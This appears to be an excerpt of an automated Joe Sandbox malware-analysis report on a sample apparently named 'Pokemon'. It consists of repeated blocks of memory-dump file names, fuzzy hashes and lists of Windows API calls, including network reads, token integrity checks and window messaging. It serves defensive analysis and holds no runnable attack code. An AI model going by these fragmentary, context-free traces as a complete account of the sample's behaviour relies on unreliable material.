                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ffb3e22146f12424fce915a6481ccf3e141d9da6ab76274371b3924fdf4ccaa1
                                                                                                                                                                                                                                                                                      • Instruction ID: 3b8b529ab534816e40a39301452855c6d812ff392a73df86e9c6d4fdcaf92609
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffb3e22146f12424fce915a6481ccf3e141d9da6ab76274371b3924fdf4ccaa1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69513835A01205DFDB15DF68D494CE9BBF0FF09314B1980A9E81A9B762D731ED86CB81
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0012766B
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00127682
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001276AB
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0010B5BE,00000000,00000000), ref: 001276D0
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001276FF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5a23e2fd30b9584a8e6d669ce800f82c571f15c03eb8ce16802899e5daa8671b
                                                                                                                                                                                                                                                                                      • Instruction ID: d05fd22a1ca0286b0f8e000090594e1357531dc98ea7be3282c6c7d325321997
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a23e2fd30b9584a8e6d669ce800f82c571f15c03eb8ce16802899e5daa8671b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3241D235A08524AFE729CF2CEC48FA77BA5FB49350F150264F819A72E0D770AD61DA50
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5bab08734a93963cfa8959e77e246e8bf7ffd76408ab0245f568ef334dfe3264
                                                                                                                                                                                                                                                                                      • Instruction ID: 4a480bff90d41c7ac17d01cb9f469ddd576243a9dcd2faf331cd0c8e08317175
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bab08734a93963cfa8959e77e246e8bf7ffd76408ab0245f568ef334dfe3264
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3419F32A002009BDB24DF78C881E9EB7F5EF89314B15856DE515EB692D631ED418B81
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetInputState.USER32 ref: 00104310
                                                                                                                                                                                                                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00104367
                                                                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00104390
                                                                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 0010439A
                                                                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001043AB
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                                      • Opcode ID: eae7736a8ead029c97a32cba18030d55bc68a69586b6f961de2fbb6b4dc9e929
                                                                                                                                                                                                                                                                                      • Instruction ID: ed0fb93a91d53d498c127968db08b45fdbe2daf7c60cd8adc1aebdb97da27d58
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eae7736a8ead029c97a32cba18030d55bc68a69586b6f961de2fbb6b4dc9e929
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 483195B0904755DFEB38DB74EC89BB637A8BB01308F041569E6E2C65E0E7F49495CB21
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000F2262
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 000F230E
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 000F2316
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 000F2327
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 000F232F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a526dca01b5cacb831b71161545246ee1d8f6bf3b09a92fc0d6cf04de24815a0
                                                                                                                                                                                                                                                                                      • Instruction ID: 0455ff7200b6c857ad141dcf4a0e26fb8a7d7390110eebe286d246bf9fd0fc25
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a526dca01b5cacb831b71161545246ee1d8f6bf3b09a92fc0d6cf04de24815a0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4431A27190021DEFDB14CFA8DD89AEE3BB5EB04315F104225FA25A76D0C7709954EB91
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0010CC63,00000000), ref: 0010D97D
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 0010D9B4
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,0010CC63,00000000), ref: 0010D9F9
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0010CC63,00000000), ref: 0010DA0D
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0010CC63,00000000), ref: 0010DA37
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cf177932f4346549f167bf9a46a4a02b8ec4edd258907750b3c7ac36b5c41b50
                                                                                                                                                                                                                                                                                      • Instruction ID: f7910c59b60f5cbdeab818fee36a9123f7c608a28f336e5383b4186e64c44882
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf177932f4346549f167bf9a46a4a02b8ec4edd258907750b3c7ac36b5c41b50
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45314C71604205FFDB24DFE9E884AABB7F8EF04354B10842EE586D3190DBB0AE419B60
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001261E4
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0012623C
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0012624E
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00126259
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 001262B5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c7086709f9a73f03d0d53df9ef09dbc5b47afe9eec72a6deaee2392d946bbcc7
                                                                                                                                                                                                                                                                                      • Instruction ID: 064bb77f93dfc464df7a92ff031a9f2ece9009bcfa09d1c738c89924e575dd2b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7086709f9a73f03d0d53df9ef09dbc5b47afe9eec72a6deaee2392d946bbcc7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE218271900268AADB21DFA4EC84EEE7BB9FF44724F104216FA25EB1C1D77099A5CF50
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 001113AE
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 001113C5
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00111401
                                                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 0011140D
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00111445
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 9be5a88f3c98c2cac707d6e375b9a149cf14e884c34aac0ad3c87896c95f0f1e
                                                                                                                                                                                                                                                                                      • Instruction ID: 8dffc26681865ccc4e11d5c0cbb16fe3ca2b7ec83467ed376b032ace68952944
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9be5a88f3c98c2cac707d6e375b9a149cf14e884c34aac0ad3c87896c95f0f1e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9218E36A00204AFDB14EF65D888A9EB7F5FF48350B048439E85A97791CB70AC41DB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 000CD146
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000CD169
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000B6A79,?,0000015D,?,?,?,?,000B85B0,000000FF,00000000,?,?), ref: 000C3BC5
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000CD18F
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000CD1A2
                                                                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000CD1B1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2d5c384d4f41817765fcfeb827f9f9462935eb710ff69eb2cb5b18e6d50d4080
                                                                                                                                                                                                                                                                                      • Instruction ID: dc6050e114ffc4efeae354c428dd11c2ba6a0a1520a886f49a7c4d959da334fc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d5c384d4f41817765fcfeb827f9f9462935eb710ff69eb2cb5b18e6d50d4080
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B0171766026157F23316766AC88E7F6AADEFC2B61318013EBD09C6245DA608D0291B1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _memcmp
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b56f4ca5d5d04ab6b11acfead640659b8270aa2b1788e9c44d91feb1eb4dedfb
                                                                                                                                                                                                                                                                                      • Instruction ID: 7e11a63a910af56206c54267d5a065cdae7d5e3c828c3ee2295d31aa2a4e56a1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b56f4ca5d5d04ab6b11acfead640659b8270aa2b1788e9c44d91feb1eb4dedfb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9601B5B164430D7BD62456209C62FFB73AD9F59398F244021FE099BA43EF63ED10D2A1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(0000000A,?,?,000BF64E,000B545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 000C3170
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C31A5
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C31CC
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 000C31D9
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 000C31E2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7b9caa4694425c16965b45786dc6b1055abb030de6d4f05cd7719567dde45ed3
                                                                                                                                                                                                                                                                                      • Instruction ID: 079e112136a1c57b4f952b83b7dcb5ec417e70d6f864d37104fd47bcd5703fec
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b9caa4694425c16965b45786dc6b1055abb030de6d4f05cd7719567dde45ed3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9901F972661A007FA6226774EC89FAF15ADABD1371329443CFC1592592EE21CA424151
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?,?,000F0C4E), ref: 000F091B
                                                                                                                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?), ref: 000F0936
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?), ref: 000F0944
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?), ref: 000F0954
                                                                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?), ref: 000F0960
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 000FF2AE
                                                                                                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 000FF2BC
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 000FF2C4
                                                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 000FF2CE
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 000FF30A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000F1A60
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A6C
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A7B
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A82
                                                                                                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000F1A99
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000F1916
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000F1922
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000F1931
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000F1938
                                                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000F194E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000F1976
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000F1982
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000F1991
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000F1998
                                                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000F19AE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 26ad91b1a5199fd1d7f1c3afe65aee101bbf0142861d1fabd4d9e01f5c205f9f
                                                                                                                                                                                                                                                                                      • Instruction ID: aa51d949a38c4308cc0bc87d54db0fba118e85ac68cb472804912b318d799b62
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26ad91b1a5199fd1d7f1c3afe65aee101bbf0142861d1fabd4d9e01f5c205f9f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01F06275104305BFD7214F65FC59F963BADEFC97A0F210414FA45C7660CA70D9618AA0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00100B24,?,00103D41,?,00000001,000D3AF4,?), ref: 00100CCB
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00100B24,?,00103D41,?,00000001,000D3AF4,?), ref: 00100CD8
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00100B24,?,00103D41,?,00000001,000D3AF4,?), ref: 00100CE5
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00100B24,?,00103D41,?,00000001,000D3AF4,?), ref: 00100CF2
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00100B24,?,00103D41,?,00000001,000D3AF4,?), ref: 00100CFF
